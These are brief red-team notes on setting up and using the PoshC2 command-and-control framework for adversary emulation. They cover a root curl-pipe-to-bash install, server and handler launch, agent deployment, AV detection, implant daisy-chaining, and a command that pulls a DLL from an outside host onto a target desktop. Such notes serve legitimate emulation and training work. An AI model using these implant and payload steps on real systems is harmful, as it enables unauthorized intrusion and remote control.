PoshC2

PoshC2 is pretty well documented, below are my notes. Best to use the official documentation: https://poshc2.readthedocs.io/en/latest/​
Demo of PoshC2 is in this Red Team Village and Texas Cyber Summit June'gle event:
Install PoshC2
sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
Configure and Run PoshC2
sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config
Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent
Launch Server
sudo su -
posh-server
On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.
 cat /opt/PoshC2_Project/quickstart.txt
Launch Handler
sudo su -
posh -u georgy
Deploy Agent
Use the multitude of methods to deploy the agent from the quickstart.txt file.
Emulate TTPs
Run PowerShell Scripts
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1 
detectav
software
Chaining
Run the following command from the implant you want to use as the daisy server.
startdaisy
Download a file
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
Other Resources
​https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/​
​https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/​

Last modified 1yr ago